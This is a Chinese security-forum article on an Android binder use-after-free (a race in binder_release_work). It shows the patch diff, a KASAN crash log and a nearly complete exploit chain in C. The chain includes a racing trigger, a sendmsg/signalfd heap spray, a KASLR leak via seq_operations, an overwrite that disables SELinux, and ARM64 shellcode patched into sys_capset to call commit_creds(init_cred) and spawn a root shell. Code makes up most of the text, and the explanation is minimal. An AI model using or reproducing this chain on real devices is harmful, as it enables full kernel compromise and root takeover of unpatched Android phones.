本文为看雪论坛精华文章
看雪论坛作者ID:LowRebSwrd
简介
PoC 的触发
struct binder_node {
int debug_id;
spinlock_t lock;
struct binder_work work; //binder_work
union {
struct rb_node rb_node;
struct hlist_node dead_node;
};
patch前后
// Before the patch
/*
 * Dequeues the first binder_work item from `list` while briefly holding
 * the inner proc lock.  The lock is dropped before the caller ever looks
 * at the returned item — that unprotected window is the bug this article
 * analyzes.
 */
static struct binder_work *binder_dequeue_work_head(
struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
binder_inner_proc_lock(proc); /* serialize the dequeue itself */
w = binder_dequeue_work_head_ilocked(list);
binder_inner_proc_unlock(proc); /* from here on `w` is unprotected */
return w;
}
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
while (1) {
w = binder_dequeue_work_head(proc, list);
/*
* From this point on, there is no lock on `proc` anymore
* which means `w` could have been freed in another thread and
* therefore be pointing to dangling memory.
*/
if (!w)
return;
switch (w->type) { /* <--- Use-after-free occurs here */
// [...]
// After the patch
patch后
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
enum binder_work_type wtype;
while (1) {
binder_inner_proc_lock(proc);
/*
* Since the lock on `proc` is held while calling
* `binder_dequeue_work_head_ilocked` and reading the `type` field of
* the resulting `binder_work` stuct, we can be sure its value has not
* been tampered with.
*/
w = binder_dequeue_work_head_ilocked(list); //这里的对binder_work->w加了锁。
wtype = w ? w->type : 0;
binder_inner_proc_unlock(proc);
if (!w)
return;
switch (wtype) { /* <--- Use-after-free not possible anymore */
// [...]
/*
 * Generates a binder transaction able to trigger the bug.
 *
 * Builds `nb` BINDER_TYPE_BINDER objects in the object buffer plus the
 * matching entries in the offset buffer, then stages a one-way
 * BC_TRANSACTION command and a binder_write_read header in the fixed
 * memory region, ready to be handed to ioctl(BINDER_WRITE_READ).
 */
static inline void init_binder_transaction(int nb) {
    uint8_t *region = (uint8_t *)MEM_ADDR;
    struct flat_binder_object *objects =
        (struct flat_binder_object *)(region + 0x400);
    uint64_t *offsets = (uint64_t *)(region + OFFSETS_START);

    for (int idx = 0; idx < nb; idx++) {
        /* Each BINDER_TYPE_BINDER object makes the driver create a binder_node. */
        objects[idx].hdr.type = BINDER_TYPE_BINDER;
        objects[idx].binder = idx;
        objects[idx].cookie = idx;
        offsets[idx] = idx * sizeof(struct flat_binder_object);
    }

    /* Transaction data referencing the object and offset buffers. */
    struct binder_transaction_data btd2 = {
        .flags = TF_ONE_WAY, /* we don't need a reply */
        .data_size = 0x28 * nb,
        .offsets_size = 8 * nb,
        .data.ptr.buffer = MEM_ADDR + 0x400,
        .data.ptr.offsets = MEM_ADDR + OFFSETS_START,
    };
    uint64_t txn_size = sizeof(uint32_t) + sizeof(btd2);

    /* Transaction command followed by its payload. */
    *(uint32_t *)(region + 0x200) = BC_TRANSACTION;
    memcpy(region + 0x204, &btd2, sizeof(btd2));

    /* Binder write/read structure consumed by BINDER_WRITE_READ. */
    struct binder_write_read bwr = {
        .write_size = txn_size * (1), // 1 txn
        .write_buffer = MEM_ADDR + 0x200
    };
    memcpy(region + 0x100, &bwr, sizeof(bwr));
}
/*
 * Trigger thread for the race: in a tight loop, (re)build a binder
 * transaction in the shared memory region, send it (which allocates a
 * binder_node), then issue BINDER_THREAD_EXIT so the kernel walks
 * thread->todo in binder_release_work() while other threads free the node.
 *
 * `argp` carries the thread index; returns NULL (pthread start routine).
 */
void *trigger_thread_func(void *argp) {
    unsigned long id = (unsigned long)argp;
    int ret = 0;
    int binder_fd = -1;
    int binder_fd_copy = -1;

    (void)id; /* thread index; kept only for symmetry with pthread_create() */

    // Opening binder device
    binder_fd = open("/dev/binder", O_RDWR);
    if (binder_fd < 0) {
        perror("An error occured while opening binder");
        /* Fix: bail out instead of spinning forever on dup(-1)/ioctl(-1). */
        return NULL;
    }
    for (;;) {
        // Refill the memory region with the transaction
        init_binder_transaction(1);
        // Copying the binder fd
        binder_fd_copy = dup(binder_fd);
        // Sending the transaction (the driver creates the binder_node here)
        ret = ioctl(binder_fd_copy, BINDER_WRITE_READ, MEM_ADDR + 0x100);
        if (ret != 0)
            debug_printf("BINDER_WRITE_READ did not work: %d", ret);
        // Binder thread exit: drains thread->todo; by the time this returns
        // the binder_node may already have been freed by another thread.
        ret = ioctl(binder_fd_copy, BINDER_THREAD_EXIT, 0);
        if (ret != 0)
            debug_printf("BINDER_THREAD_EXIT did not work: %d", ret);
        // Closing binder device
        close(binder_fd_copy);
    }
    return NULL;
}
/*
 * Entry point: maps the fixed memory region used by
 * init_binder_transaction(), then launches NB_TRIGGER_THREADS racing
 * threads and waits for them (they loop forever unless binder fails).
 */
int main() {
    pthread_t trigger_threads[NB_TRIGGER_THREADS];
    // Memory region for binder transactions
    if (mmap((void*)MEM_ADDR, MEM_SIZE, PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        /* Fix: the original ignored mmap() failure; every later access to
         * MEM_ADDR would then fault in userland instead of the kernel. */
        perror("mmap");
        return 1;
    }
    // Init random
    srand(time(0));
    // Get rid of stdout/stderr buffering
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    // Starting trigger threads (several threads are needed to win the race)
    debug_print("Starting trigger threads");
    for (unsigned long i = 0; i < NB_TRIGGER_THREADS; i++) {
        if (pthread_create(&trigger_threads[i], NULL, trigger_thread_func, (void*)i) != 0)
            perror("pthread_create"); /* Fix: surface thread-creation failure */
    }
    // Waiting for trigger threads
    for (unsigned long i = 0; i < NB_TRIGGER_THREADS; i++)
        pthread_join(trigger_threads[i], NULL);
    return 0;
}
新用户态调用回溯
// Userland code from the exploit: obtain a binder fd, then ask the driver
// to tear the calling binder thread down (the entry point into
// binder_thread_release / binder_release_work shown below).
int binder_fd = open("/dev/binder", O_RDWR);
ioctl(binder_fd, BINDER_THREAD_EXIT, 0); /* Fix: missing semicolon */
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
// [...]
case BINDER_THREAD_EXIT:
binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
proc->pid, thread->pid);
binder_thread_release(proc, thread);
thread = NULL;
break;
// [...]
/*
 * Excerpt: tears down a binder thread.  Relevant here because it calls
 * binder_release_work() on thread->todo — the list the PoC races on.
 */
static int binder_thread_release(struct binder_proc *proc,
struct binder_thread *thread)
{
// [...]
/* Drains any undelivered work items still queued on this thread. */
binder_release_work(proc, &thread->todo);
binder_thread_dec_tmpref(thread);
return active_transactions;
}
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
while (1) {
w = binder_dequeue_work_head(proc, list); /* dequeues from thread->todo */
if (!w)
return;
// [...]
/*
 * Excerpt: handles a BINDER_TYPE_BINDER object inside a transaction.
 * Takes a reference on the node; note that &thread->todo is passed as the
 * target work list.
 */
static int binder_translate_binder(struct flat_binder_object *fp,
struct binder_transaction *t,
struct binder_thread *thread)
{
// [...]
/* Bumps the node's refcount and may enqueue node->work on thread->todo. */
ret = binder_inc_ref_for_node(target_proc, node,
fp->hdr.type == BINDER_TYPE_BINDER,
&thread->todo, &rdata);
// [...]
}
/*
 * Excerpt: takes a reference on `node` for `proc`, forwarding to
 * binder_inc_ref_olocked() with the caller-provided target work list.
 */
static int binder_inc_ref_for_node(struct binder_proc *proc,
struct binder_node *node,
bool strong,
struct list_head *target_list,
struct binder_ref_data *rdata)
{
// [...]
/* May end up queueing &node->work on target_list (see
 * binder_inc_node_nilocked below). */
ret = binder_inc_ref_olocked(ref, strong, target_list);
// [...]
}
/*
 * Excerpt: increments a node's refcount.  Either branch can enqueue the
 * node's embedded `work` item on target_list — this is how a binder_node
 * ends up linked on thread->todo.
 */
static int binder_inc_node_nilocked(struct binder_node *node, int strong,
int internal,
struct list_head *target_list)
{
// [...]
if (strong) {
// [...]
if (!node->has_strong_ref && target_list) {
// [...]
binder_enqueue_deferred_thread_work_ilocked(thread,
&node->work); /* strong reference taken on this node */
}
} else {
// [...]
if (!node->has_weak_ref && list_empty(&node->work.entry)) {
// [...]
binder_enqueue_work_ilocked(&node->work, target_list); /* weak reference case */
}
}
return 0;
}
/*
 * Frees a binder_node.  NOTE(review): per the KASAN report below, this can
 * run while node->work is still queued on a thread's todo list, leaving a
 * dangling list entry behind.
 */
static void binder_free_node(struct binder_node *node)
{
kfree(node);
binder_stats_deleted(BINDER_STAT_NODE);
}
int binder_parse(struct binder_state *bs, struct binder_io *bio,
uintptr_t ptr, size_t size, binder_handler func)
{
// [...]
switch(cmd) {
// [...]
case BR_TRANSACTION_SEC_CTX:
case BR_TRANSACTION: {
// [...]
if (func) {
// [...]
if (txn.transaction_data.flags & TF_ONE_WAY) {
binder_free_buffer(bs, txn.transaction_data.data.ptr.buffer);
} else {
binder_send_reply(bs, &reply, txn.transaction_data.data.ptr.buffer, res);
}
}
break;
}
// [...]
static int binder_thread_write(struct binder_proc *proc,
struct binder_thread *thread,
binder_uintptr_t binder_buffer, size_t size,
binder_size_t *consumed)
{
// [...]
case BC_FREE_BUFFER: {
// [...]
binder_transaction_buffer_release(proc, buffer, 0, false);
// [...]
}
// [...]
static void binder_transaction_buffer_release(struct binder_proc *proc,
struct binder_buffer *buffer,
binder_size_t failed_at,
bool is_failure)
{
// [...]
switch (hdr->type) {
// [...]
case BINDER_TYPE_HANDLE:
case BINDER_TYPE_WEAK_HANDLE: {
struct flat_binder_object *fp;
struct binder_ref_data rdata;
int ret;
fp = to_flat_binder_object(hdr);
ret = binder_dec_ref_for_handle(proc, fp->handle,
hdr->type == BINDER_TYPE_HANDLE, &rdata);
// [...]
} break;
// [...]
/*
 * Excerpt: increments or decrements the binder_ref behind a handle.  On
 * the decrement path the ref — and with it the node — can be freed.
 */
static int binder_update_ref_for_handle(struct binder_proc *proc,
uint32_t desc, bool increment, bool strong,
struct binder_ref_data *rdata)
{
// [...]
if (increment)
ret = binder_inc_ref_olocked(ref, strong, NULL);
else
/*
 * Decrements the reference count by one and returns true since it
 * dropped to zero
 */
delete_ref = binder_dec_ref_olocked(ref, strong);
// [...]
/* delete_ref is true, the binder node is freed */
if (delete_ref)
binder_free_ref(ref);
return ret;
// [...]
}
/*
 * Frees a binder_ref and, if one is attached, its binder_node — this is
 * the "Freed by task" path in the KASAN report below.
 */
static void binder_free_ref(struct binder_ref *ref)
{
if (ref->node)
binder_free_node(ref->node);
kfree(ref->death); /* kfree(NULL) is a no-op, so no guard is needed */
kfree(ref);
}
<3>[81169.367408] c6 20464 ==================================================================
<3>[81169.367435] c6 20464 BUG: KASAN: use-after-free in binder_release_work+0x84/0x1b8
<3>[81169.367469] c6 20464 Read of size 4 at addr ffffffc053e45850 by task poc/20464
<3>[81169.367481] c6 20464
<4>[81169.367498] c6 20464 CPU: 6 PID: 20464 Comm: poc Tainted: G S W 4.14.170-g551313822-dirty_audio-g199e9bf #1
<4>[81169.367507] c6 20464 Hardware name: Qualcomm Technologies, Inc. SM8150 V2 PM8150 Google Inc. MSM sm8150 Flame (DT)
<4>[81169.367514] c6 20464 Call trace:
<4>[81169.367530] c6 20464 dump_backtrace+0x0/0x380
<4>[81169.367541] c6 20464 show_stack+0x20/0x2c
<4>[81169.367554] c6 20464 dump_stack+0xc4/0x11c
<4>[81169.367576] c6 20464 print_address_description+0x70/0x240
<4>[81169.367594] c6 20464 kasan_report_error+0x1a0/0x204
<4>[81169.367605] c6 20464 kasan_report_error+0x0/0x204
<4>[81169.367619] c6 20464 __asan_load4+0x80/0x84 //引用
<4>[81169.367631] c6 20464 binder_release_work+0x84/0x1b8
<4>[81169.367644] c6 20464 binder_thread_release+0x2ac/0x2e0
<4>[81169.367655] c6 20464 binder_ioctl+0x9a4/0x122c
<4>[81169.367680] c6 20464 do_vfs_ioctl+0x7c8/0xefc
<4>[81169.367693] c6 20464 SyS_ioctl+0x68/0xa0
<4>[81169.367716] c6 20464 el0_svc_naked+0x34/0x38
<3>[81169.367725] c6 20464
<3>[81169.367734] c6 20464 Allocated by task 20464:
<4>[81169.367747] c6 20464 kasan_kmalloc+0xe0/0x1ac
<4>[81169.367761] c6 20464 kmem_cache_alloc_trace+0x3b8/0x454
<4>[81169.367774] c6 20464 binder_new_node+0x4c/0x394 //分配
<4>[81169.367802] c6 20464 binder_transaction+0x2398/0x4308
<4>[81169.367816] c6 20464 binder_ioctl_write_read+0xc28/0x4dc8
<4>[81169.367826] c6 20464 binder_ioctl+0x650/0x122c
<4>[81169.367836] c6 20464 do_vfs_ioctl+0x7c8/0xefc
<4>[81169.367846] c6 20464 SyS_ioctl+0x68/0xa0
<4>[81169.367862] c6 20464 el0_svc_naked+0x34/0x38
<3>[81169.367868] c6 20464
<4>[81169.367936] c7 20469 CPU7: update max cpu_capacity 989
<3>[81169.368496] c6 20464 Freed by task 594:
<4>[81169.368518] c6 20464 __kasan_slab_free+0x13c/0x21c
<4>[81169.368534] c6 20464 kasan_slab_free+0x10/0x1c
<4>[81169.368549] c6 20464 kfree+0x248/0x810 //释放
<4>[81169.368564] c6 20464 binder_free_ref+0x30/0x64
<4>[81169.368584] c6 20464 binder_update_ref_for_handle+0x294/0x2b0
<4>[81169.368600] c6 20464 binder_transaction_buffer_release+0x46c/0x7a0
<4>[81169.368616] c6 20464 binder_ioctl_write_read+0x21d0/0x4dc8
<4>[81169.368653] c6 20464 binder_ioctl+0x650/0x122c
<4>[81169.368667] c6 20464 do_vfs_ioctl+0x7c8/0xefc
<4>[81169.368684] c6 20464 SyS_ioctl+0x68/0xa0
<4>[81169.368697] c6 20464 el0_svc_naked+0x34/0x38
<3>[81169.368704] c6 20464
<3>[81169.368735] c6 20464 The buggy address belongs to the object at ffffffc053e45800
<3>[81169.368735] c6 20464 which belongs to the cache kmalloc-256 of size 256
<3>[81169.368753] c6 20464 The buggy address is located 80 bytes inside of
<3>[81169.368753] c6 20464 256-byte region [ffffffc053e45800, ffffffc053e45900)
<3>[81169.368767] c6 20464 The buggy address belongs to the page:
<0>[81169.368779] c6 20464 page:ffffffbf014f9100 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0
<0>[81169.368804] c6 20464 flags: 0x10200(slab|head)
<1>[81169.368824] c6 20464 raw: 0000000000010200 0000000000000000 0000000000000000 0000000100150015
<1>[81169.368843] c6 20464 raw: ffffffbf04e39e00 0000000e00000002 ffffffc148c0fa00 0000000000000000
<1>[81169.368867] c6 20464 page dumped because: kasan: bad access detected
<3>[81169.368882] c6 20464
<3>[81169.368894] c6 20464 Memory state around the buggy address:
<3>[81169.368910] c6 20464 ffffffc053e45700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
<3>[81169.368955] c6 20464 ffffffc053e45780: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
<3>[81169.368984] c6 20464 >ffffffc053e45800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
<3>[81169.368997] c6 20464 ^
<3>[81169.369012] c6 20464 ffffffc053e45880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
<3>[81169.369037] c6 20464 ffffffc053e45900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
<3>[81169.369049] c6 20464 ==================================================================
利用exploit
/*
 * Spray thread: after the race frees a binder_node, reallocate its
 * kmalloc-256 slot with attacker-controlled data.  sendmsg()'s control
 * buffer provides the transient allocation whose contents overlap the
 * freed node (ctl_buf[6] lands on binder_work.type), and signalfd() pins
 * subsequent allocations in kernel memory for the later exploit stages.
 *
 * `argp` is a struct spray_thread_data*; returns NULL (pthread routine).
 */
void *spray_thread_func(void *argp) {
    struct spray_thread_data *data = (struct spray_thread_data*)argp;
    int delay;
    int msg_buf[SENDMSG_SIZE / sizeof(int)];
    int ctl_buf[SENDMSG_CONTROL_SIZE / sizeof(int)];
    struct msghdr spray_msg;
    struct iovec siov;
    uint64_t sigset_value;
    // Sendmsg control buffer initialization
    memset(&spray_msg, 0, sizeof(spray_msg));
    /* Fix: zero both buffers so the sprayed kernel data is deterministic
     * instead of whatever happened to be on this thread's stack. */
    memset(msg_buf, 0, sizeof(msg_buf));
    memset(ctl_buf, 0, sizeof(ctl_buf));
    ctl_buf[0] = SENDMSG_CONTROL_SIZE - WORK_STRUCT_OFFSET;
    ctl_buf[6] = 0xdeadbeef; /* w->type value */
    siov.iov_base = msg_buf;
    siov.iov_len = SENDMSG_SIZE;
    spray_msg.msg_iov = &siov;
    spray_msg.msg_iovlen = 1;
    spray_msg.msg_control = ctl_buf;
    spray_msg.msg_controllen = SENDMSG_CONTROL_SIZE - WORK_STRUCT_OFFSET;
    for (;;) {
        // Barrier - Before spray
        pthread_barrier_wait(&data->barrier);
        // Waiting some time (random jitter so thread interleavings vary)
        delay = rand() % SPRAY_DELAY;
        /* Fix: `volatile` stops the compiler from deleting this busy-wait,
         * which would silently remove the intended timing jitter at -O2. */
        for (volatile int i = 0; i < delay; i++) {}
        for (uint64_t i = 0; i < NB_SIGNALFDS; i++) {
            // Arbitrary signalfd value (will become relevant later)
            sigset_value = ~0;
            // Non-blocking sendmsg
            sendmsg(data->sock_fds[0], &spray_msg, MSG_OOB);
            // Signalfd call to pin sendmsg's control buffer in kernel memory
            signalfd_fds[data->trigger_id][data->spray_id][i] = signalfd(-1, (sigset_t*)&sigset_value, 0);
            if (signalfd_fds[data->trigger_id][data->spray_id][i] <= 0)
                debug_printf("Could not open signalfd - %d (%s)\n", signalfd_fds[data->trigger_id][data->spray_id][i], strerror(errno));
        }
        // Barrier - After spray
        pthread_barrier_wait(&data->barrier);
    }
    return NULL;
}
/*
 * Full pre-patch binder_release_work(): drains undelivered work items from
 * `list`.  Each item is dequeued under the proc lock inside
 * binder_dequeue_work_head(), but the lock is released before w->type is
 * read below — so `w` may already point to freed memory by then.
 */
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
while (1) {
w = binder_dequeue_work_head(proc, list);
if (!w)
return;
switch (w->type) { /* <-- unlocked read of possibly-freed memory */
case BINDER_WORK_TRANSACTION: {
/* Work embedded in a binder_transaction: clean it up properly. */
struct binder_transaction *t;
t = container_of(w, struct binder_transaction, work);
binder_cleanup_transaction(t, "process died.",
BR_DEAD_REPLY);
} break;
case BINDER_WORK_RETURN_ERROR: {
struct binder_error *e = container_of(
w, struct binder_error, work);
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered TRANSACTION_ERROR: %u\n",
e->cmd);
} break;
case BINDER_WORK_TRANSACTION_COMPLETE: {
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered TRANSACTION_COMPLETE\n");
kfree(w);
binder_stats_deleted(BINDER_STAT_TRANSACTION_COMPLETE);
} break;
case BINDER_WORK_DEAD_BINDER_AND_CLEAR:
case BINDER_WORK_CLEAR_DEATH_NOTIFICATION: {
struct binder_ref_death *death;
death = container_of(w, struct binder_ref_death, work);
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered death notification, %016llx\n",
(u64)death->cookie);
kfree(death);
binder_stats_deleted(BINDER_STAT_DEATH);
} break;
default:
/* Unknown type: log and leak rather than free the wrong object. */
pr_err("unexpected work type, %d, not freed\n",
w->type);
break;
}
}
}
/*
 * Disposes of an undelivered transaction: synchronous transactions with a
 * target node get a failure reply; one-way (or node-less) ones are freed.
 */
static void binder_cleanup_transaction(struct binder_transaction *t,
const char *reason,
uint32_t error_code)
{
if (t->buffer->target_node && !(t->flags & TF_ONE_WAY)) {
binder_send_failed_reply(t, error_code);
} else {
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered transaction %d, %s\n",
t->debug_id, reason);
binder_free_transaction(t);
}
}
/*
 * Frees a binder_transaction, first unlinking it from its buffer under the
 * target proc's inner lock.
 */
static void binder_free_transaction(struct binder_transaction *t)
{
struct binder_proc *target_proc = t->to_proc;
if (target_proc) {
binder_inner_proc_lock(target_proc);
if (t->buffer)
t->buffer->transaction = NULL;
binder_inner_proc_unlock(target_proc);
}
/*
 * If the transaction has no target_proc, then
 * t->buffer->transaction has already been cleared.
 */
kfree(t); /* the transaction object is ultimately freed here */
binder_stats_deleted(BINDER_STAT_TRANSACTION);
}
绕过KASLR
/*
 * Kernel seq_file operations table.  The exploit below sprays these
 * (by opening /proc/self/stat) so one overlaps a controlled signalfd:
 * reading the sigmask then leaks the `start` function pointer — a kernel
 * text address — from which the KASLR slide is derived.
 */
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
int proc_self = open("/proc/self", O_RDONLY);
/* Releasing the signalfd object that was corrupted by our overlapping one */
if (corrupt_fd)
close(corrupt_fd);
/* Checking the value read by the overlapping fd */
uint64_t = get_sigfd_sigmask(overlapping_fd);
debug_printf("Value @X after freeing `corrupt_fd`: 0x%lx", mask);
/* Allocating seq_operations objects so that it overlaps with our signalfd */
retry:
for (int i = 0; i < NB_SEQ; i++) {
seq_fd[i] = openat(proc_self, "stat", O_RDONLY);
if (seq_fd[i] < 0)
debug_printf("Could not allocate seq ops (%d - %s)", i, strerror(errno));
}
/* Reading the value after spraying */
mask = get_sigfd_sigmask(overlapping_fd);
debug_printf("Value @X after spraying seq ops: 0x%lx", mask);
/* Checking if the KASLR leak read meets the condition */
kaslr_leak = mask - SINGLE_START;
if ((kaslr_leak & 0xffff) != 0) {
debug_print("Could not leak KASLR slide");
/* If not, we close all seq_fds are try again */
for (int i = 0; i < NB_SEQ; i++) {
close(seq_fd[i]);
}
goto retry;
}
/* If it works we display the KASLR leak */
debug_printf("KASLR slide: %lx", kaslr_leak);
任意读写内核-KSMA
后续root部分
1. 关掉selinux
/* Disabling SELinux enforcement by writing straight through the remapped
 * kernel region (presumably set up by the KSMA stage — see the heading
 * above; confirm against the full exploit). */
/* selinux_enforcing address in the remapped kernel region */
uint64_t selinux_enforcing_addr = base + 0x80000 + SELINUX_ENFORCING;
debug_printf("Before: enforcing = %x\n", *(uint32_t *)selinux_enforcing_addr);
/* setting selinux_enforcing to 0 */
*(uint32_t *)selinux_enforcing_addr = 0;
debug_printf("After: enforcing = %x\n", *(uint32_t *)selinux_enforcing_addr);
2. get root.
#define LO_DWORD(addr) ((addr) & 0xffffffff)
#define HI_DWORD(addr) LO_DWORD((addr) >> 32)
/* Preparing addresses for the shellcode */
uint64_t sys_capset_addr = base + 0x80000 + SYS_CAPSET;
uint64_t init_cred_addr = kaslr_leak + INIT_CRED;
uint64_t commit_creds_addr = kaslr_leak + COMMIT_CREDS;
uint32_t shellcode[] = {
// commit_creds(init_cred)
0x58000040, // ldr x0, .+8
0x14000003, // b .+12
LO_DWORD(init_cred_addr),
HI_DWORD(init_cred_addr),
0x58000041, // ldr x1, .+8
0x14000003, // b .+12
LO_DWORD(commit_creds_addr),
HI_DWORD(commit_creds_addr),
0xA9BF7BFD, // stp x29, x30, [sp, #-0x10]!
0xD63F0020, // blr x1
0xA8C17BFD, // ldp x29, x30, [sp], #0x10
0x2A1F03E0, // mov w0, wzr
0xD65F03C0, // ret
};
/* Saving sys_capset current code */
uint8_t sys_capset[sizeof(shellcode)];
memcpy(sys_capset, sys_capset_addr, sizeof(sys_capset));
/* Patching sys_capset with our shellcode */
debug_print("Patching SyS_capset()\n");
memcpy(sys_capset_addr, shellcode, sizeof(shellcode));
/* Calling our patched version of sys_capset */
ret = capset(NULL, NULL);
debug_printf("capset returned %d", ret);
if (ret < 0) perror("capset failed");
/* Restoring sys_capset */
debug_print("Restoring SyS_capset()");
memcpy(sys_capset_addr, sys_capset, sizeof(sys_capset));
/* Starting a shell */
system("sh");
exit(0);
总结
看雪ID:LowRebSwrd
https://bbs.pediy.com/user-home-726411.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!